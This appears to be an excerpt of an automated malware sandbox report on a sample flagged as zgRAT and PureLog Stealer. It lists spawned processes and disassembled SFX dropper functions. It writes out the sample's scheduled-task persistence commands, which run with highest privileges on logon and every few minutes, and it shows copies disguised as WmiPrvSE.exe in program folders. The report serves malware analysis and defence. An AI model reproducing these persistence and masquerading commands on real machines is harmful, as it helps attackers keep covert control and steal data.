Commandline:	schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgW" /sc ONLOGON /tr "'C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6181a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	10:23:15
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 9 /tr "'C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6181a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	10:23:16
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "hyperProviderbrokermonitorNeth" /sc MINUTE /mo 5 /tr "'C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe'" /f
Imagebase:	0x7ff6181a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	10:23:16
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "hyperProviderbrokermonitorNet" /sc ONLOGON /tr "'C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6181a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	10:23:16
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "hyperProviderbrokermonitorNeth" /sc MINUTE /mo 14 /tr "'C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6181a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	10:23:16
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JWcAfTbAe8.bat"
Imagebase:	0x7ff659400000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	10:23:16
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	10:23:16
Start date:	11/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6bd150000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	10:23:16
Start date:	11/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7b25a0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	10:23:16
Start date:	11/01/2025
Path:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
Wow64 process (32bit):	false
Commandline:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
Imagebase:	0x410000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	10:23:16
Start date:	11/01/2025
Path:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
Wow64 process (32bit):	false
Commandline:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
Imagebase:	0x8b0000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	10:23:17
Start date:	11/01/2025
Path:	C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe
Imagebase:	0x840000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	10:23:20
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe"
Imagebase:	0x7ff659400000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	10:23:20
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	10:23:21
Start date:	11/01/2025
Path:	C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe"
Imagebase:	0x780000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	10:23:21
Start date:	11/01/2025
Path:	C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe"
Imagebase:	0x5e0000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.3%
Total number of Nodes:	1513
Total number of Limit Nodes:	29

Executed Functions

Function 009FDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009F0863: GetModuleHandleW.KERNEL32(kernel32), ref: 009F087C
Part of subcall function 009F0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009F088E
Part of subcall function 009F0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 009F08BF

Part of subcall function 009FA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 009FA655

Part of subcall function 009FAC16: OleInitialize.OLE32(00000000), ref: 009FAC2F
Part of subcall function 009FAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 009FAC66
Part of subcall function 009FAC16: SHGetMalloc.SHELL32(00A28438), ref: 009FAC70

GetCommandLineW.KERNEL32 ref: 009FDF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 009FDF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 009FDF94
UnmapViewOfFile.KERNEL32(00000000), ref: 009FDFCE

Part of subcall function 009FDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 009FDBF4
Part of subcall function 009FDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 009FDC30

CloseHandle.KERNEL32(00000000), ref: 009FDFD7
GetModuleFileNameW.KERNEL32(00000000,00A3EC90,00000800), ref: 009FDFF2
SetEnvironmentVariableW.KERNEL32(sfxname,00A3EC90), ref: 009FDFFE
GetLocalTime.KERNEL32(?), ref: 009FE009
_swprintf.LIBCMT ref: 009FE048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 009FE05A
GetModuleHandleW.KERNEL32(00000000), ref: 009FE061
LoadIconW.USER32(00000000,00000064), ref: 009FE078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 009FE0C9
Sleep.KERNEL32(?), ref: 009FE0F7
DeleteObject.GDI32 ref: 009FE130
DeleteObject.GDI32(?), ref: 009FE140
CloseHandle.KERNEL32 ref: 009FE183

Strings

C:\Users\user\Desktop, xrefs: 009FDF33
sfxname, xrefs: 009FDFF9
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 009FE039
STARTDLG, xrefs: 009FE0BE
winrarsfxmappingfile.tmp, xrefs: 009FDF77
sfxstime, xrefs: 009FE055

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-277078469
Opcode ID: 11576016c4edf029708b577802cb80dc8830ee6f7848483e666a1a3e8c984183
Instruction ID: 93cc3df56cd7a6f0c7d2dc044f571db4736ccdb31bb143a324ae694487786573
Opcode Fuzzy Hash: 11576016c4edf029708b577802cb80dc8830ee6f7848483e666a1a3e8c984183
Instruction Fuzzy Hash: 4B61C371A09248BFD720EFF5EC49F7B77ACAB89704F000429FA46921A1DB789D46C761

Function 009FA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,009FB73D,00000066), ref: 009FA6D5
SizeofResource.KERNEL32(00000000,?,?,?,009FB73D,00000066), ref: 009FA6EC
LoadResource.KERNEL32(00000000,?,?,?,009FB73D,00000066), ref: 009FA703
LockResource.KERNEL32(00000000,?,?,?,009FB73D,00000066), ref: 009FA712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,009FB73D,00000066), ref: 009FA72D
GlobalLock.KERNEL32(00000000), ref: 009FA73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 009FA762
GlobalUnlock.KERNEL32(00000000), ref: 009FA7C6

Part of subcall function 009FA626: GdipAlloc.GDIPLUS(00000010), ref: 009FA62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 009FA7A7
GlobalFree.KERNEL32(00000000), ref: 009FA7CD

Strings

PNG, xrefs: 009FA6C6

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: 6731789548da74e9df3be6351d4744518d7b125c4636e0f8018f5eba9101ec2e
Instruction ID: b0a1cbf8e7476211635568cefd9b53720327c3a87a770b9350f5d91d7a5d24f0
Opcode Fuzzy Hash: 6731789548da74e9df3be6351d4744518d7b125c4636e0f8018f5eba9101ec2e
Instruction Fuzzy Hash: D13184B6900306BFDB10AF61EC48D7B7FBDEF84760B144629F90992660EB31D9468B61

Function 009EA69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,009EA592,000000FF,?,?), ref: 009EA6C4

Part of subcall function 009EBB03: _wcslen.LIBCMT ref: 009EBB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,009EA592,000000FF,?,?), ref: 009EA6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,009EA592,000000FF,?,?), ref: 009EA6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,009EA592,000000FF,?,?), ref: 009EA728
GetLastError.KERNEL32(?,?,?,?,009EA592,000000FF,?,?), ref: 009EA734

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: f9c1e8c9ffba83b508e01ba70bfed3d07e3bc47c05d98e12bb1d94773df759f9
Instruction ID: 6655b04f9a1388d13d5c5b5e22b83f1cc0e0b77de975c55d39942e9667c997c0
Opcode Fuzzy Hash: f9c1e8c9ffba83b508e01ba70bfed3d07e3bc47c05d98e12bb1d94773df759f9
Instruction Fuzzy Hash: 03418F72900159ABCB26DF65CC84AEEB7B8FB48350F104196F559E3210D7346E90CF90

Function 00A07DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00A07DC4,00000000,00A1C300,0000000C,00A07F1B,00000000,00000002,00000000), ref: 00A07E0F
TerminateProcess.KERNEL32(00000000,?,00A07DC4,00000000,00A1C300,0000000C,00A07F1B,00000000,00000002,00000000), ref: 00A07E16
ExitProcess.KERNEL32 ref: 00A07E28

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 8a276af778f29fa1da85209386fffc93440e6124e09ea49386195bee9ec76061
Instruction ID: b99f46448eb33b4a37e01e76764777bf05f1ab1ebddc5a202e0a842a93959eff
Opcode Fuzzy Hash: 8a276af778f29fa1da85209386fffc93440e6124e09ea49386195bee9ec76061
Instruction Fuzzy Hash: B3E04F32441148EBCF01AF50EE499893F6AEF04341B008454F8098A172CB36EE52CB90

Function 009E848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E8493

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2870e4d3af8bfdb8dcc225b0e196c234601a3bc8c3acc1c724f15654d274e271
Instruction ID: 6d85b87d5dae883c7cf66b011f7e504db59b26d649396b2fd3302c7cd63438ad
Opcode Fuzzy Hash: 2870e4d3af8bfdb8dcc225b0e196c234601a3bc8c3acc1c724f15654d274e271
Instruction Fuzzy Hash: D482D6709042C5AEDF17DBA5C891BFBBBADAF45300F0845B9E85D9B182DB315E84CB60

Function 009FB7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009FB7E5

Part of subcall function 009E1316: GetDlgItem.USER32(00000000,00003021), ref: 009E135A
Part of subcall function 009E1316: SetWindowTextW.USER32(00000000,00A135F4), ref: 009E1370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 009FB8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009FB8EF
IsDialogMessageW.USER32(?,?), ref: 009FB902
TranslateMessage.USER32(?), ref: 009FB910
DispatchMessageW.USER32(?), ref: 009FB91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 009FB93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 009FB960
GetDlgItem.USER32(?,00000068), ref: 009FB983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 009FB99E
SendMessageW.USER32(00000000,000000C2,00000000,00A135F4), ref: 009FB9B1

Part of subcall function 009FD453: _wcslen.LIBCMT ref: 009FD47D

SetFocus.USER32(00000000), ref: 009FB9B8
_swprintf.LIBCMT ref: 009FBA24

Part of subcall function 009E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E40A5

Part of subcall function 009FD4D4: GetDlgItem.USER32(00000068,00A3FCB8), ref: 009FD4E8
Part of subcall function 009FD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,009FAF07,00000001,?,?,009FB7B9,00A1506C,00A3FCB8,00A3FCB8,00001000,00000000,00000000), ref: 009FD510
Part of subcall function 009FD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 009FD51B
Part of subcall function 009FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00A135F4), ref: 009FD529
Part of subcall function 009FD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 009FD53F
Part of subcall function 009FD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 009FD559
Part of subcall function 009FD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 009FD59D
Part of subcall function 009FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 009FD5AB
Part of subcall function 009FD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 009FD5BA
Part of subcall function 009FD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 009FD5E1
Part of subcall function 009FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00A143F4), ref: 009FD5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 009FBA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 009FBA90
GetTickCount.KERNEL32 ref: 009FBAAE
_swprintf.LIBCMT ref: 009FBAC2
GetLastError.KERNEL32(?,00000011), ref: 009FBAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 009FBB43
_swprintf.LIBCMT ref: 009FBB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 009FBBD0
GetCommandLineW.KERNEL32 ref: 009FBBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 009FBC47
ShellExecuteExW.SHELL32(0000003C), ref: 009FBC6F
Sleep.KERNEL32(00000064), ref: 009FBCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 009FBCE2
CloseHandle.KERNEL32(00000000), ref: 009FBCEB
_swprintf.LIBCMT ref: 009FBD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 009FBD7D
SetDlgItemTextW.USER32(?,00000065,00A135F4), ref: 009FBD94
GetDlgItem.USER32(?,00000065), ref: 009FBD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 009FBDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009FBDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 009FBE68
_wcslen.LIBCMT ref: 009FBEBE
_swprintf.LIBCMT ref: 009FBEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 009FBF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 009FBF4C
GetDlgItem.USER32(?,00000068), ref: 009FBF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 009FBF6B
GetDlgItem.USER32(?,00000066), ref: 009FBF85
SetWindowTextW.USER32(00000000,00A2A472), ref: 009FBFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 009FC007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 009FC01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 009FC0BD
EnableWindow.USER32(00000000,00000000), ref: 009FC197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 009FC1D9

Part of subcall function 009FC73F: __EH_prolog.LIBCMT ref: 009FC744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 009FC1FD

Strings

C:\Users\user\Desktop, xrefs: 009FBBC9
"%s"%s, xrefs: 009FBD0D
%s, xrefs: 009FBED8
@, xrefs: 009FBB91
STARTDLG, xrefs: 009FB801
winrarsfxmappingfile.tmp, xrefs: 009FBBA6
__tmp_rar_sfx_access_check_%u, xrefs: 009FBAB5
LICENSEDLG, xrefs: 009FC0B2
-el -s2 "-d%s" "-sp%s", xrefs: 009FBB6B
<, xrefs: 009FBB84

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-1670982708
Opcode ID: cf4d62ed746da10c5072acbbeb009fba8b9047e98595716e20360c41ba0aceab
Instruction ID: 3c81f23e08a0f720c264f09b7d4e3517690709f7c2799ffdc5b43e9b682205d2
Opcode Fuzzy Hash: cf4d62ed746da10c5072acbbeb009fba8b9047e98595716e20360c41ba0aceab
Instruction Fuzzy Hash: 8342D47594428CBAEF21EFA4DD4AFBE376CAB51700F004165F744A60D2CB799E46CB21

Function 009F0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 009F087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009F088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 009F08BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 009F0B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009F0B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 009F0B93
ReadFile.KERNEL32(00000000,?,00007FFE,00A13C7C,00000000), ref: 009F0BB1
CloseHandle.KERNEL32(00000000), ref: 009F0C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 009F0C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00A13C7C,?,00000000,?,00000800), ref: 009F0C72
GetFileAttributesW.KERNELBASE(?,?,00A13C7C,00000800,?,00000000,?,00000800), ref: 009F0C9C
GetFileAttributesW.KERNEL32(?,?,00A13D44,00000800), ref: 009F0CD8

Part of subcall function 009F081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009F0836
Part of subcall function 009F081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009EF2D8,Crypt32.dll,00000000,009EF35C,?,?,009EF33E,?,?,?), ref: 009F0858

